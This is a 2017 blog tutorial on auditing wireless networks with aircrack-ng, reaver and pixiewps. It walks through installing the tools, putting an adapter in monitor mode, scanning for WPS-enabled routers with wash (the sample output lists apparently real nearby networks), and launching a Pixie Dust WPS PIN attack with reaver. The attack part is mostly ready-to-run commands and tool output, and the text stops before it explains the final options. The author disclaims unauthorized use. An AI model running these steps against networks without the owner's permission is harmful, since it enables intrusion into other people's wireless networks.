Tuesday, April 11, 2017

Kali Linux Tutorial Wireless Auditing with Aircrack ng Reaver and Pixiewps

Kali Linux Tutorial Wireless Auditing with Aircrack ng Reaver and Pixiewps


Wireless Auditing with Aircrack-ng, Reaver, and Pixiewps- picateshackz.com

PicaTesHackZ do not condone the illicit activities of wireless auditing on unauthorized systems. We do however encourage you to use this knowledge to your benefit to learn and practice exploitation using the latest in Wireless Auditing. Although I did do a write up about using reaver and pixiewps, there has been updates, I have more tests, and more knowledge on the tools. Please keep in mind it is illegal to penetrate networks that are not your own without proper permission. This falls on you, so do what you will but we will hold no liability for your actions.

Prerequisites


  • Kali-Linux (32bit or 64bit)
  • Active Internet Connection
  • A Brain


Introduction

Ok to start, we are going to boot up Kali. The first steps are to upgrade aircrack-ng 1.2RC, reaver fork 1.5.2, as well as pixiewps 1.1. With Kali this is very simple, after the Kali instructions I will include how to compile from the source for reaver fork and pixiewps. There are several people to thank for this project, so I will just say, Thank you to the creators of Kali Linux, the creators of the aircrack suite, the creators of reaver (as well as the fork) and also the creator of pixiewps and the individual that discovered the pixiewps exploit. I would like to say Im not going to go super in depth in the use of aircrack-ng. There is so much documentation and tutorials floating around I feel it would be an overlooked section and too large to take care of, I will go over the relevant changes with the new version for our purposes.


Upgrading/Installing Aircrack-ng, reaver fork, and pixiewps

Kali Instructions:

Code:
apt-get update
apt-get dist-upgrade
Ok were done.

Compiling forked reaver and pixiewps from source:


1. Install dependancies:

Code: 
apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip


2. Download the files:

Code: 
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget https://github.com/wiire/pixiewps/archive/master.zip


3. Extract the downloads:

Code: 
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip


4. Cleanup the zip files:

Code:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip


5. Setup Reaver:

Change Directory to /reaver-wps-fork-t6x-master/src

Code:
chmod 777 configure
./configure
make
make install


6. Setup pixiewps:

Change Directory to /pixiewps-master/src

Code:
make
make install
Ok so now we are setup with the latest and greatest even if they update the applications by the time you read this, the setup is still relevant as the download links will download the master fork from GitHub.

How to use aircrack-ng


So lets focus on the changes to airodump-ng as well as airmon-ng. So we will focus around cracking the WPS pin, so what has the aircrack team done with airodump to locate WPS enabled routers? They added a --wps command!

An example command we can run with airodump-ng is as follows:



So as you can see, airodump-ng can now display WPS routers. Now we do have another option which is to use reaver (wash command) but I will get to that later, were talking about aircrack right now. If you notice in the image and command above, there is my wireless adapter with a new name airmon-ng now has a new way to handle monitor mode on your devices. Lets take a look at the command.


Example airmon-ng command:

Code:
airmon-ng start wlan0 -v

The example output is as follows (mine is wlan1)

Code:
root@kali:~# airmon-ng start wlan1 -v
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 2505 NetworkManager
 2610 wpa_supplicant
10481 dhclient

PHY Interface Driver Chipset

phy0 wlan1 rt2800pci Ralink corp. RT3090 Wireless 802.11n 1T/1R PCIeUsage:iw [options] dev <devname> set channel <channel> [HT20|HT40+|HT40-]
Options:
--debug enable netlink debugging

(mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
(mac80211 station mode vif disabled for [phy0]wlan1)
airmon-ng will also now kill processes that may interfere with monitor mode on your device. As shown above the new monitor mode interface is:
wlan1mon

Well run iwconfig to confirm:

Code: 
root@kali:~# iwconfig
wlan1mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm 
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
         
eth0      no wireless extensions.

lo        no wireless extensions.
Ok so these changes to aircrack will help us with cracking some access points!

Using wash to find WPS enabled routers

Ok so our options for wash are as follows:

Code:
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -o, --out-file=<file>                Write data to file
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -D, --daemonize                      Daemonize wash
        -C, --ignore-fcs                     Ignore frame checksum errors
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
        -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
        -h, --help                           Show help

Example:
        wash -i mon0


Ok so now I want to point out a new option "-g" this option will attempt to get the chipset for the router as well. However using this method will take extra time to display the routers. The command we will be using is as follows (with or without the -g option, however if using the -g option a channel is required to be set)

Code:
wash -i wlan1mon -C


Our output is as follows

Code:
root@kali:~# wash -i wlan1mon -C

Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62       1            -79        1.0               No                NETGEAR10
44:32:C8:53:D1:A4       1            -85        1.0               No                HOME-D1A4
08:86:3B:21:F3:1C      11            -81        1.0               No                belkin.31c
66:EB:8C:3C:4A:31      11            -77        1.0               No                DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0       1            -83        1.0               No                HOME-FFF2
6C:B0:CE:9F:DD:25      11            -75        1.0               No                NETGEAR91
90:1A:CA:41:63:60      11            -81        1.0               No                HOME-6362

Now looking at this, I do seem to be fairly far from several targets, so beacons are going to be difficult to get the packets necessary to run reaver. So lets look at the usage for this reaver fork so we can go over some functions to use directly with pixiewps.


Code:
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
        -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set into PixieLoop mode (doesnt send M4, and loops through to M3) [False]
        -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
        reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
So the command were going to run is as follows

Code:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vv -c # -K 1 -P


Lets focus on the -K 1 and -P options